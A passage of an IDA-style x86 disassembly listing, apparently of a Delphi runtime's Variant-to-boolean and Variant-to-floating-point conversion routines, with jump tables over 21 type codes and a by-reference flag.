mov eax, [ebp+var_4] ; jumptable 4000FAB0 case 7
mov eax, [eax+8]
fld qword ptr [eax]
call sub_400030A8
mov [ebp+var_10], eax
mov [ebp+var_C], edx
jmp loc_4000FC62
; ---------------------------------------------------------------------------
loc_4000FB9A: ; CODE XREF: sub_4000F860+250�j
; DATA XREF: sub_4000F860:off_4000FAB7�o
mov eax, [ebp+var_4] ; jumptable 4000FAB0 case 8
call sub_4000F6A8
mov [ebp+var_10], eax
mov [ebp+var_C], edx
jmp loc_4000FC62
; ---------------------------------------------------------------------------
loc_4000FBAD: ; CODE XREF: sub_4000F860+250�j
; DATA XREF: sub_4000F860:off_4000FAB7�o
mov eax, [ebp+var_4] ; jumptable 4000FAB0 case 11
mov eax, [eax+8]
movsx eax, word ptr [eax]
cdq
mov [ebp+var_10], eax
mov [ebp+var_C], edx
jmp loc_4000FC62
; ---------------------------------------------------------------------------
loc_4000FBC2: ; CODE XREF: sub_4000F860+250�j
; DATA XREF: sub_4000F860:off_4000FAB7�o
mov eax, [ebp+var_4] ; jumptable 4000FAB0 case 16
mov eax, [eax+8]
movsx eax, byte ptr [eax]
cdq
mov [ebp+var_10], eax
mov [ebp+var_C], edx
jmp loc_4000FC62
; ---------------------------------------------------------------------------
loc_4000FBD7: ; CODE XREF: sub_4000F860+250�j
; DATA XREF: sub_4000F860:off_4000FAB7�o
mov eax, [ebp+var_4] ; jumptable 4000FAB0 case 17
mov eax, [eax+8]
movzx eax, byte ptr [eax]
xor edx, edx
mov [ebp+var_10], eax
mov [ebp+var_C], edx
jmp short loc_4000FC62
; ---------------------------------------------------------------------------
loc_4000FBEA: ; CODE XREF: sub_4000F860+250�j
; DATA XREF: sub_4000F860:off_4000FAB7�o
mov eax, [ebp+var_4] ; jumptable 4000FAB0 case 18
mov eax, [eax+8]
movzx eax, word ptr [eax]
xor edx, edx
mov [ebp+var_10], eax
mov [ebp+var_C], edx
jmp short loc_4000FC62
; ---------------------------------------------------------------------------
loc_4000FBFD: ; CODE XREF: sub_4000F860+250�j
; DATA XREF: sub_4000F860:off_4000FAB7�o
mov eax, [ebp+var_4] ; jumptable 4000FAB0 case 19
mov eax, [eax+8]
mov eax, [eax]
xor edx, edx
mov [ebp+var_10], eax
mov [ebp+var_C], edx
jmp short loc_4000FC62
; ---------------------------------------------------------------------------
loc_4000FC0F: ; CODE XREF: sub_4000F860+250�j
; DATA XREF: sub_4000F860:off_4000FAB7�o
mov eax, [ebp+var_4] ; jumptable 4000FAB0 case 20
mov eax, [eax+8]
mov edx, [eax]
mov [ebp+var_10], edx
mov edx, [eax+4]
mov [ebp+var_C], edx
jmp short loc_4000FC62
; ---------------------------------------------------------------------------
loc_4000FC22: ; CODE XREF: sub_4000F860+250�j
; DATA XREF: sub_4000F860:off_4000FAB7�o
mov eax, [ebp+var_4] ; jumptable 4000FAB0 case 12
mov eax, [eax+8]
call sub_4000F860
mov [ebp+var_10], eax
mov [ebp+var_C], edx
jmp short loc_4000FC62
; ---------------------------------------------------------------------------
loc_4000FC35: ; CODE XREF: sub_4000F860+24A�j
; sub_4000F860+250�j
; DATA XREF: ...
mov eax, [ebp+var_4] ; default
; jumptable 4000FAB0 cases 0,1,9,10,13-15
call sub_4000F5FC
mov [ebp+var_10], eax
mov [ebp+var_C], edx
jmp short loc_4000FC62
; ---------------------------------------------------------------------------
loc_4000FC45: ; CODE XREF: sub_4000F860+236�j
lea edx, [ebp+var_10]
mov eax, [ebp+var_4]
call sub_4000F814
test al, al
jnz short loc_4000FC62
mov eax, [ebp+var_4]
call sub_4000F5FC
mov [ebp+var_10], eax
mov [ebp+var_C], edx
loc_4000FC62: ; CODE XREF: sub_4000F860+95�j
; sub_4000F860+BE�j ...
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
jmp short loc_4000FC93
; ---------------------------------------------------------------------------
loc_4000FC6C: ; DATA XREF: sub_4000F860+F�o
jmp sub_400040D8
; ---------------------------------------------------------------------------
mov eax, [ebp+var_4]
movzx eax, word ptr [eax]
mov dx, 14h
call sub_4000E068
mov [ebp+var_10], 0
mov [ebp+var_C], 0
call sub_40004360
loc_4000FC93: ; CODE XREF: sub_4000F860+40A�j
mov eax, [ebp+var_10]
mov edx, [ebp+var_C]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_4000F860 endp
; ---------------------------------------------------------------------------
flt_4000FCA0 dd 1.0e4 ; DATA XREF: sub_4000F860+11A�r
; sub_4000F860+30C�r
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4000FCA4 proc near ; CODE XREF: sub_4000FE58+10B�p
; sub_4000FE58+1A3�p ...
var_C = dword ptr -0Ch
var_8 = word ptr -8
var_5 = byte ptr -5
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0
push 0
push 0
push ebx
mov ebx, eax
xor eax, eax
push ebp
push offset loc_4000FD56
push dword ptr fs:[eax]
mov fs:[eax], esp
mov edx, ebx
lea eax, [ebp+var_4]
call sub_40011DFC
lea eax, [ebp+var_8]
push eax
push 0
push 400h
mov eax, [ebp+var_4]
push eax
mov eax, off_4001AFC0
mov eax, [eax]
call eax
mov edx, eax
sub edx, 80020005h
jz short loc_4000FCFF
sub edx, 7FFDFFFBh
jnz short loc_4000FD2C
cmp [ebp+var_8], 1
sbb eax, eax
inc eax
mov [ebp+var_5], al
jmp short loc_4000FD38
; ---------------------------------------------------------------------------
loc_4000FCFF: ; CODE XREF: sub_4000FCA4+44�j
lea eax, [ebp+var_C]
mov edx, [ebp+var_4]
call sub_40004B0C
mov eax, [ebp+var_C]
lea edx, [ebp+var_5]
call sub_40007F40
test al, al
jnz short loc_4000FD38
movzx edx, word ptr [ebx]
mov cx, 0Bh
mov eax, 80020005h
call sub_4000E034
jmp short loc_4000FD38
; ---------------------------------------------------------------------------
loc_4000FD2C: ; CODE XREF: sub_4000FCA4+4C�j
movzx edx, word ptr [ebx]
mov cx, 0Bh
call sub_4000E034
loc_4000FD38: ; CODE XREF: sub_4000FCA4+59�j
; sub_4000FCA4+73�j ...
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_4000FD5D
loc_4000FD45: ; CODE XREF: sub_4000FCA4+B7�j
lea eax, [ebp+var_C]
call sub_40004884
lea eax, [ebp+var_4]
call sub_40005008
retn
; ---------------------------------------------------------------------------
loc_4000FD56: ; DATA XREF: sub_4000FCA4+F�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_4000FD45
; ---------------------------------------------------------------------------
loc_4000FD5D: ; CODE XREF: sub_4000FCA4+B1�j
; DATA XREF: sub_4000FCA4+9C�o
movzx eax, [ebp+var_5]
pop ebx
mov esp, ebp
pop ebp
retn
sub_4000FCA4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4000FD68 proc near ; CODE XREF: sub_4000FE58+184�p
; sub_4000FE58+325�p ...
var_14 = byte ptr -14h
var_C = word ptr -0Ch
push ebx
add esp, 0FFFFFFF0h
mov ebx, eax
push esp
call sub_4000CDD8
push 0Bh
push 0
push 400h
push ebx
lea eax, [esp+24h+var_14]
push eax
mov eax, off_4001B064
mov eax, [eax]
call eax
movzx edx, word ptr [ebx]
mov cx, 0Bh
call sub_4000E034
cmp [esp+14h+var_C], 1
sbb eax, eax
inc eax
add esp, 10h
pop ebx
retn
sub_4000FD68 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4000FDA8 proc near ; CODE XREF: sub_4000FE58+1B2�p
var_11 = byte ptr -11h
var_1 = byte ptr -1
push ebp
mov ebp, esp
add esp, 0FFFFFFECh
push ebx
mov ebx, eax
lea eax, [ebp+var_11]
push eax
call sub_4000CDD8
xor eax, eax
push ebp
push offset loc_4000FDFC
push dword ptr fs:[eax]
mov fs:[eax], esp
mov edx, ebx
lea eax, [ebp+var_11]
call sub_4000E700
lea eax, [ebp+var_11]
call ds:off_4001F29C
lea eax, [ebp+var_11]
call sub_4000FE58
mov [ebp+var_1], al
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_4000FE03
loc_4000FDF3: ; CODE XREF: sub_4000FDA8+59�j
lea eax, [ebp+var_11]
call sub_4000E3D8
retn
; ---------------------------------------------------------------------------
loc_4000FDFC: ; DATA XREF: sub_4000FDA8+15�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_4000FDF3
; ---------------------------------------------------------------------------
loc_4000FE03: ; CODE XREF: sub_4000FDA8+53�j
; DATA XREF: sub_4000FDA8+46�o
movzx eax, [ebp+var_1]
pop ebx
mov esp, ebp
pop ebp
retn
sub_4000FDA8 endp
; =============== S U B R O U T I N E =======================================
sub_4000FE0C proc near ; CODE XREF: sub_4000FE58+333�p
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_14 = word ptr -14h
push ebx
push esi
push edi
add esp, 0FFFFFFECh
mov edi, edx
mov esi, eax
mov edx, esp
movzx eax, word ptr [esi]
call sub_40012D98
mov ebx, eax
test bl, bl
jz short loc_4000FE4C
lea eax, [esp+20h+var_1C]
push eax
call sub_4000CDD8
push 0Bh
mov ecx, esi
lea edx, [esp+24h+var_1C]
mov eax, [esp+24h+var_20]
mov esi, [eax]
call dword ptr [esi+1Ch]
cmp [esp+20h+var_14], 1
sbb eax, eax
inc eax
mov [edi], al
loc_4000FE4C: ; CODE XREF: sub_4000FE0C+18�j
mov eax, ebx
add esp, 14h
pop edi
pop esi
pop ebx
retn
sub_4000FE0C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4000FE58 proc near ; CODE XREF: sub_4000E9CC+172�p
; sub_4000EBF8+6C�p ...
var_8 = byte ptr -8
push ebx
push ecx
mov ebx, eax
movzx eax, word ptr [ebx]
movzx edx, ax
cmp edx, 14h ; switch 21 cases
ja loc_4000FFE9 ; default
; jumptable 4000FE6B cases 10,14,15
jmp ds:off_4000FE72[edx*4] ; switch jump
; ---------------------------------------------------------------------------
off_4000FE72 dd offset loc_4000FEC6 ; DATA XREF: sub_4000FE58+13�r
dd offset loc_4000FECF ; jump table for switch statement
dd offset loc_4000FEEE
dd offset loc_4000FEFC
dd offset loc_4000FF09
dd offset loc_4000FF1F
dd offset loc_4000FF35
dd offset loc_4000FF4B
dd offset loc_4000FF61
dd offset loc_4000FFDA
dd offset loc_4000FFE9
dd offset loc_4000FF70
dd offset loc_4000FFCA
dd offset loc_4000FFDA
dd offset loc_4000FFE9
dd offset loc_4000FFE9
dd offset loc_4000FF80
dd offset loc_4000FF8D
dd offset loc_4000FF9A
dd offset loc_4000FFA8
dd offset loc_4000FFB5
; ---------------------------------------------------------------------------
loc_4000FEC6: ; CODE XREF: sub_4000FE58+13�j
; DATA XREF: sub_4000FE58:off_4000FE72�o
mov [esp+8+var_8], 0 ; jumptable 4000FE6B case 0
jmp loc_4001019E
; ---------------------------------------------------------------------------
loc_4000FECF: ; CODE XREF: sub_4000FE58+13�j
; DATA XREF: sub_4000FE58:off_4000FE72�o
cmp byte_4001AA10, 0 ; jumptable 4000FE6B case 1
jz short loc_4000FEE5
mov dx, 0Bh
mov ax, 1
call sub_4000DBF4
loc_4000FEE5: ; CODE XREF: sub_4000FE58+7E�j
mov [esp+8+var_8], 0
jmp loc_4001019E
; ---------------------------------------------------------------------------
loc_4000FEEE: ; CODE XREF: sub_4000FE58+13�j
; DATA XREF: sub_4000FE58:off_4000FE72�o
cmp word ptr [ebx+8], 0 ; jumptable 4000FE6B case 2
setnz [esp+8+var_8]
jmp loc_4001019E
; ---------------------------------------------------------------------------
loc_4000FEFC: ; CODE XREF: sub_4000FE58+13�j
; DATA XREF: sub_4000FE58:off_4000FE72�o
cmp dword ptr [ebx+8], 0 ; jumptable 4000FE6B case 3
setnz [esp+8+var_8]
jmp loc_4001019E
; ---------------------------------------------------------------------------
loc_4000FF09: ; CODE XREF: sub_4000FE58+13�j
; DATA XREF: sub_4000FE58:off_4000FE72�o
fld dword ptr [ebx+8] ; jumptable 4000FE6B case 4
fcomp ds:flt_400101A8
fstsw ax
sahf
setnz [esp+8+var_8]
jmp loc_4001019E
; ---------------------------------------------------------------------------
loc_4000FF1F: ; CODE XREF: sub_4000FE58+13�j
; DATA XREF: sub_4000FE58:off_4000FE72�o
fld qword ptr [ebx+8] ; jumptable 4000FE6B case 5
fcomp ds:flt_400101A8
fstsw ax
sahf
setnz [esp+8+var_8]
jmp loc_4001019E
; ---------------------------------------------------------------------------
loc_4000FF35: ; CODE XREF: sub_4000FE58+13�j
; DATA XREF: sub_4000FE58:off_4000FE72�o
fild qword ptr [ebx+8] ; jumptable 4000FE6B case 6
fcomp ds:flt_400101A8
fstsw ax
sahf
setnz [esp+8+var_8]
jmp loc_4001019E
; ---------------------------------------------------------------------------
loc_4000FF4B: ; CODE XREF: sub_4000FE58+13�j
; DATA XREF: sub_4000FE58:off_4000FE72�o
fld qword ptr [ebx+8] ; jumptable 4000FE6B case 7
fcomp ds:flt_400101A8
fstsw ax
sahf
setnz [esp+8+var_8]
jmp loc_4001019E
; ---------------------------------------------------------------------------
loc_4000FF61: ; CODE XREF: sub_4000FE58+13�j
; DATA XREF: sub_4000FE58:off_4000FE72�o
mov eax, ebx ; jumptable 4000FE6B case 8
call sub_4000FCA4
mov [esp+8+var_8], al
jmp loc_4001019E
; ---------------------------------------------------------------------------
loc_4000FF70: ; CODE XREF: sub_4000FE58+13�j
; DATA XREF: sub_4000FE58:off_4000FE72�o
cmp word ptr [ebx+8], 1 ; jumptable 4000FE6B case 11
sbb eax, eax
inc eax
mov [esp+8+var_8], al
jmp loc_4001019E
; ---------------------------------------------------------------------------
loc_4000FF80: ; CODE XREF: sub_4000FE58+13�j
; DATA XREF: sub_4000FE58:off_4000FE72�o
cmp byte ptr [ebx+8], 0 ; jumptable 4000FE6B case 16
setnz [esp+8+var_8]
jmp loc_4001019E
; ---------------------------------------------------------------------------
loc_4000FF8D: ; CODE XREF: sub_4000FE58+13�j
; DATA XREF: sub_4000FE58:off_4000FE72�o
cmp byte ptr [ebx+8], 0 ; jumptable 4000FE6B case 17
setnz [esp+8+var_8]
jmp loc_4001019E
; ---------------------------------------------------------------------------
loc_4000FF9A: ; CODE XREF: sub_4000FE58+13�j
; DATA XREF: sub_4000FE58:off_4000FE72�o
cmp word ptr [ebx+8], 0 ; jumptable 4000FE6B case 18
setnz [esp+8+var_8]
jmp loc_4001019E
; ---------------------------------------------------------------------------
loc_4000FFA8: ; CODE XREF: sub_4000FE58+13�j
; DATA XREF: sub_4000FE58:off_4000FE72�o
cmp dword ptr [ebx+8], 0 ; jumptable 4000FE6B case 19
setnz [esp+8+var_8]
jmp loc_4001019E
; ---------------------------------------------------------------------------
loc_4000FFB5: ; CODE XREF: sub_4000FE58+13�j
; DATA XREF: sub_4000FE58:off_4000FE72�o
cmp dword ptr [ebx+0Ch], 0 ; jumptable 4000FE6B case 20
jnz short loc_4000FFBF
cmp dword ptr [ebx+8], 0
loc_4000FFBF: ; CODE XREF: sub_4000FE58+161�j
setnz al
mov [esp+8+var_8], al
jmp loc_4001019E
; ---------------------------------------------------------------------------
loc_4000FFCA: ; CODE XREF: sub_4000FE58+13�j
; DATA XREF: sub_4000FE58:off_4000FE72�o
mov eax, [ebx+8] ; jumptable 4000FE6B case 12
call sub_4000FE58
mov [esp+8+var_8], al
jmp loc_4001019E
; ---------------------------------------------------------------------------
loc_4000FFDA: ; CODE XREF: sub_4000FE58+13�j
; DATA XREF: sub_4000FE58:off_4000FE72�o
mov eax, ebx ; jumptable 4000FE6B cases 9,13
call sub_4000FD68
mov [esp+8+var_8], al
jmp loc_4001019E
; ---------------------------------------------------------------------------
loc_4000FFE9: ; CODE XREF: sub_4000FE58+D�j
; sub_4000FE58+13�j
; DATA XREF: ...
mov edx, eax ; default
; jumptable 4000FE6B cases 10,14,15
sub dx, 100h
jz short loc_4000FFF9
dec dx
jz short loc_40010008
jmp short loc_40010017
; ---------------------------------------------------------------------------
loc_4000FFF9: ; CODE XREF: sub_4000FE58+198�j
mov eax, ebx
call sub_4000FCA4
mov [esp+8+var_8], al
jmp loc_4001019E
; ---------------------------------------------------------------------------
loc_40010008: ; CODE XREF: sub_4000FE58+19D�j
mov eax, ebx
call sub_4000FDA8
mov [esp+8+var_8], al
jmp loc_4001019E
; ---------------------------------------------------------------------------
loc_40010017: ; CODE XREF: sub_4000FE58+19F�j
test ah, 40h
jz loc_40010187
movzx eax, ax
and eax, 0FFFFBFFFh
cmp eax, 14h ; switch 21 cases
ja loc_4001017B ; default
; jumptable 40010031 cases 0,1,9,10,13-15
jmp ds:off_40010038[eax*4] ; switch jump
; ---------------------------------------------------------------------------
off_40010038 dd offset loc_4001017B ; DATA XREF: sub_4000FE58+1D9�r
dd offset loc_4001017B ; jump table for switch statement
dd offset loc_4001008C
dd offset loc_4001009C
dd offset loc_400100AB
dd offset loc_400100C3
dd offset loc_400100DB
dd offset loc_400100F3
dd offset loc_4001010B
dd offset loc_4001017B
dd offset loc_4001017B
dd offset loc_4001011A
dd offset loc_4001016E
dd offset loc_4001017B
dd offset loc_4001017B
dd offset loc_4001017B
dd offset loc_40010129
dd offset loc_40010135
dd offset loc_40010141
dd offset loc_4001014E
dd offset loc_4001015A
; ---------------------------------------------------------------------------
loc_4001008C: ; CODE XREF: sub_4000FE58+1D9�j
; DATA XREF: sub_4000FE58:off_40010038�o
mov eax, [ebx+8] ; jumptable 40010031 case 2
cmp word ptr [eax], 0
setnz [esp+8+var_8]
jmp loc_4001019E
; ---------------------------------------------------------------------------
loc_4001009C: ; CODE XREF: sub_4000FE58+1D9�j
; DATA XREF: sub_4000FE58:off_40010038�o
mov eax, [ebx+8] ; jumptable 40010031 case 3
cmp dword ptr [eax], 0
setnz [esp+8+var_8]
jmp loc_4001019E
; ---------------------------------------------------------------------------
loc_400100AB: ; CODE XREF: sub_4000FE58+1D9�j
; DATA XREF: sub_4000FE58:off_40010038�o
mov eax, [ebx+8] ; jumptable 40010031 case 4
fld dword ptr [eax]
fcomp ds:flt_400101A8
fstsw ax
sahf
setnz [esp+8+var_8]
jmp loc_4001019E
; ---------------------------------------------------------------------------
loc_400100C3: ; CODE XREF: sub_4000FE58+1D9�j
; DATA XREF: sub_4000FE58:off_40010038�o
mov eax, [ebx+8] ; jumptable 40010031 case 5
fld qword ptr [eax]
fcomp ds:flt_400101A8
fstsw ax
sahf
setnz [esp+8+var_8]
jmp loc_4001019E
; ---------------------------------------------------------------------------
loc_400100DB: ; CODE XREF: sub_4000FE58+1D9�j
; DATA XREF: sub_4000FE58:off_40010038�o
mov eax, [ebx+8] ; jumptable 40010031 case 6
fild qword ptr [eax]
fcomp ds:flt_400101A8
fstsw ax
sahf
setnz [esp+8+var_8]
jmp loc_4001019E
; ---------------------------------------------------------------------------
loc_400100F3: ; CODE XREF: sub_4000FE58+1D9�j
; DATA XREF: sub_4000FE58:off_40010038�o
mov eax, [ebx+8] ; jumptable 40010031 case 7
fld qword ptr [eax]
fcomp ds:flt_400101A8
fstsw ax
sahf
setnz [esp+8+var_8]
jmp loc_4001019E
; ---------------------------------------------------------------------------
loc_4001010B: ; CODE XREF: sub_4000FE58+1D9�j
; DATA XREF: sub_4000FE58:off_40010038�o
mov eax, ebx ; jumptable 40010031 case 8
call sub_4000FCA4
mov [esp+8+var_8], al
jmp loc_4001019E
; ---------------------------------------------------------------------------
loc_4001011A: ; CODE XREF: sub_4000FE58+1D9�j
; DATA XREF: sub_4000FE58:off_40010038�o
mov eax, [ebx+8] ; jumptable 40010031 case 11
cmp word ptr [eax], 1
sbb eax, eax
inc eax
mov [esp+8+var_8], al
jmp short loc_4001019E
; ---------------------------------------------------------------------------
loc_40010129: ; CODE XREF: sub_4000FE58+1D9�j
; DATA XREF: sub_4000FE58:off_40010038�o
mov eax, [ebx+8] ; jumptable 40010031 case 16
cmp byte ptr [eax], 0
setnz [esp+8+var_8]
jmp short loc_4001019E
; ---------------------------------------------------------------------------
loc_40010135: ; CODE XREF: sub_4000FE58+1D9�j
; DATA XREF: sub_4000FE58:off_40010038�o
mov eax, [ebx+8] ; jumptable 40010031 case 17
cmp byte ptr [eax], 0
setnz [esp+8+var_8]
jmp short loc_4001019E
; ---------------------------------------------------------------------------
loc_40010141: ; CODE XREF: sub_4000FE58+1D9�j
; DATA XREF: sub_4000FE58:off_40010038�o
mov eax, [ebx+8] ; jumptable 40010031 case 18
cmp word ptr [eax], 0
setnz [esp+8+var_8]
jmp short loc_4001019E
; ---------------------------------------------------------------------------
loc_4001014E: ; CODE XREF: sub_4000FE58+1D9�j
; DATA XREF: sub_4000FE58:off_40010038�o
mov eax, [ebx+8] ; jumptable 40010031 case 19
cmp dword ptr [eax], 0
setnz [esp+8+var_8]
jmp short loc_4001019E
; ---------------------------------------------------------------------------
loc_4001015A: ; CODE XREF: sub_4000FE58+1D9�j
; DATA XREF: sub_4000FE58:off_40010038�o
mov eax, [ebx+8] ; jumptable 40010031 case 20
cmp dword ptr [eax+4], 0
jnz short loc_40010166
cmp dword ptr [eax], 0
loc_40010166: ; CODE XREF: sub_4000FE58+309�j
setnz al
mov [esp+8+var_8], al
jmp short loc_4001019E
; ---------------------------------------------------------------------------
loc_4001016E: ; CODE XREF: sub_4000FE58+1D9�j
; DATA XREF: sub_4000FE58:off_40010038�o
mov eax, [ebx+8] ; jumptable 40010031 case 12
call sub_4000FE58
mov [esp+8+var_8], al
jmp short loc_4001019E
; ---------------------------------------------------------------------------
loc_4001017B: ; CODE XREF: sub_4000FE58+1D3�j
; sub_4000FE58+1D9�j
; DATA XREF: ...
mov eax, ebx ; default
; jumptable 40010031 cases 0,1,9,10,13-15
call sub_4000FD68
mov [esp+8+var_8], al
jmp short loc_4001019E
; ---------------------------------------------------------------------------
loc_40010187: ; CODE XREF: sub_4000FE58+1C2�j
mov edx, esp
mov eax, ebx
call sub_4000FE0C
test al, al
jnz short loc_4001019E
mov eax, ebx
call sub_4000FD68
mov [esp+8+var_8], al
loc_4001019E: ; CODE XREF: sub_4000FE58+72�j
; sub_4000FE58+91�j ...
movzx eax, [esp+8+var_8]
pop edx
pop ebx
retn
sub_4000FE58 endp
; ---------------------------------------------------------------------------
align 4
flt_400101A8 dd 0.0 ; DATA XREF: sub_4000FE58+B4�r
; sub_4000FE58+CA�r ...
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_400101AC proc near ; CODE XREF: sub_4001036C+FE�p
; sub_4001036C+1B9�p ...
var_24 = dword ptr -24h
var_20 = tbyte ptr -20h
var_10 = qword ptr -10h
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFDCh
push ebx
xor edx, edx
mov [ebp+var_24], edx
mov [ebp+var_4], edx
mov ebx, eax
xor eax, eax
push ebp
push offset loc_40010261
push dword ptr fs:[eax]
mov fs:[eax], esp
mov edx, ebx
lea eax, [ebp+var_4]
call sub_40011DFC
lea eax, [ebp+var_10]
push eax
push 0
push 400h
mov eax, [ebp+var_4]
push eax
mov eax, off_4001AFF0
mov eax, [eax]
call eax
mov edx, eax
sub edx, 80020005h
jz short loc_40010201
sub edx, 7FFDFFFBh
jnz short loc_40010237
jmp short loc_40010243
; ---------------------------------------------------------------------------
loc_40010201: ; CODE XREF: sub_400101AC+49�j
lea eax, [ebp+var_24]
mov edx, [ebp+var_4]
call sub_40004B0C
mov eax, [ebp+var_24]
lea edx, [ebp+var_20]
call sub_40008E74
test al, al
jz short loc_40010224
fld [ebp+var_20]
fstp [ebp+var_10]
wait
jmp short loc_40010243
; ---------------------------------------------------------------------------
loc_40010224: ; CODE XREF: sub_400101AC+6D�j
movzx edx, word ptr [ebx]
mov cx, 5
mov eax, 80020005h
call sub_4000E034
jmp short loc_40010243
; ---------------------------------------------------------------------------
loc_40010237: ; CODE XREF: sub_400101AC+51�j
movzx edx, word ptr [ebx]
mov cx, 5
call sub_4000E034
loc_40010243: ; CODE XREF: sub_400101AC+53�j
; sub_400101AC+76�j ...
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40010268
loc_40010250: ; CODE XREF: sub_400101AC+BA�j
lea eax, [ebp+var_24]
call sub_40004884
lea eax, [ebp+var_4]
call sub_40005008
retn
; ---------------------------------------------------------------------------
loc_40010261: ; DATA XREF: sub_400101AC+14�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_40010250
; ---------------------------------------------------------------------------
loc_40010268: ; CODE XREF: sub_400101AC+B4�j
; DATA XREF: sub_400101AC+9F�o
fld [ebp+var_10]
pop ebx
mov esp, ebp
pop ebp
retn
sub_400101AC endp
; =============== S U B R O U T I N E =======================================
sub_40010270 proc near ; CODE XREF: sub_4001036C+199�p
; sub_4001036C+349�p ...
var_1C = qword ptr -1Ch
var_14 = byte ptr -14h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
push ebx
add esp, 0FFFFFFE8h
mov ebx, eax
lea eax, [esp+1Ch+var_14]
push eax
call sub_4000CDD8
push 5
push 0
push 400h
push ebx
lea eax, [esp+2Ch+var_14]
push eax
mov eax, off_4001B064
mov eax, [eax]
call eax
movzx edx, word ptr [ebx]
mov cx, 5
call sub_4000E034
mov eax, [esp+1Ch+var_C]
mov dword ptr [esp+1Ch+var_1C], eax
mov eax, [esp+1Ch+var_8]
mov dword ptr [esp+1Ch+var_1C+4], eax
fld [esp+1Ch+var_1C]
add esp, 18h
pop ebx
retn
sub_40010270 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_400102BC proc near ; CODE XREF: sub_4001036C+1C9�p
var_18 = byte ptr -18h
var_8 = qword ptr -8
push ebp
mov ebp, esp
add esp, 0FFFFFFE8h
push ebx
mov ebx, eax
lea eax, [ebp+var_18]
push eax
call sub_4000CDD8
xor eax, eax
push ebp
push offset loc_40010311
push dword ptr fs:[eax]
mov fs:[eax], esp
mov edx, ebx
lea eax, [ebp+var_18]
call sub_4000E700
lea eax, [ebp+var_18]
call ds:off_4001F29C
lea eax, [ebp+var_18]
call sub_4001036C
fstp [ebp+var_8]
wait
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40010318
loc_40010308: ; CODE XREF: sub_400102BC+5A�j
lea eax, [ebp+var_18]
call sub_4000E3D8
retn
; ---------------------------------------------------------------------------
loc_40010311: ; DATA XREF: sub_400102BC+15�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_40010308
; ---------------------------------------------------------------------------
loc_40010318: ; CODE XREF: sub_400102BC+54�j
; DATA XREF: sub_400102BC+47�o
fld [ebp+var_8]
pop ebx
mov esp, ebp
pop ebp
retn
sub_400102BC endp
; =============== S U B R O U T I N E =======================================
sub_40010320 proc near ; CODE XREF: sub_4001036C+358�p
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
push ebx
push esi
push edi
add esp, 0FFFFFFECh
mov edi, edx
mov esi, eax
mov edx, esp
movzx eax, word ptr [esi]
call sub_40012D98
mov ebx, eax
test bl, bl
jz short loc_40010362
lea eax, [esp+20h+var_1C]
push eax
call sub_4000CDD8
push 5
mov ecx, esi
lea edx, [esp+24h+var_1C]
mov eax, [esp+24h+var_20]
mov esi, [eax]
call dword ptr [esi+1Ch]
mov eax, [esp+20h+var_14]
mov [edi], eax
mov eax, [esp+20h+var_10]
mov [edi+4], eax
loc_40010362: ; CODE XREF: sub_40010320+18�j
mov eax, ebx
add esp, 14h
pop edi
pop esi
pop ebx
retn
sub_40010320 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4001036C proc near ; CODE XREF: sub_4000E9CC+116�p
; sub_400102BC+36�p ...
var_18 = qword ptr -18h
var_10 = dword ptr -10h
var_C = qword ptr -0Ch
push ebx
add esp, 0FFFFFFECh
mov ebx, eax
movzx eax, word ptr [ebx]
movzx edx, ax
cmp edx, 14h ; switch 21 cases
ja loc_40010513 ; default
; jumptable 40010381 cases 10,14,15
jmp ds:off_40010388[edx*4] ; switch jump
; ---------------------------------------------------------------------------
off_40010388 dd offset loc_400103DC ; DATA XREF: sub_4001036C+15�r
dd offset loc_400103EA ; jump table for switch statement
dd offset loc_4001040E
dd offset loc_4001041A
dd offset loc_40010426
dd offset loc_40010432
dd offset loc_40010444
dd offset loc_40010456
dd offset loc_40010468
dd offset loc_40010503
dd offset loc_40010513
dd offset loc_40010478
dd offset loc_400104F2
dd offset loc_40010503
dd offset loc_40010513
dd offset loc_40010513
dd offset loc_4001048D
dd offset loc_400104A2
dd offset loc_400104B7
dd offset loc_400104CC
dd offset loc_400104E6
; ---------------------------------------------------------------------------
loc_400103DC: ; CODE XREF: sub_4001036C+15�j
; DATA XREF: sub_4001036C:off_40010388�o
xor eax, eax ; jumptable 40010381 case 0
mov dword ptr [esp+18h+var_18], eax
mov dword ptr [esp+18h+var_18+4], eax
jmp loc_400106D8
; ---------------------------------------------------------------------------
loc_400103EA: ; CODE XREF: sub_4001036C+15�j
; DATA XREF: sub_4001036C:off_40010388�o
cmp byte_4001AA10, 0 ; jumptable 40010381 case 1
jz short loc_40010400
mov dx, 5
mov ax, 1
call sub_4000DBF4
loc_40010400: ; CODE XREF: sub_4001036C+85�j
xor eax, eax
mov dword ptr [esp+18h+var_18], eax
mov dword ptr [esp+18h+var_18+4], eax
jmp loc_400106D8
; ---------------------------------------------------------------------------
loc_4001040E: ; CODE XREF: sub_4001036C+15�j
; DATA XREF: sub_4001036C:off_40010388�o
fild word ptr [ebx+8] ; jumptable 40010381 case 2
fstp [esp+18h+var_18]
wait
jmp loc_400106D8
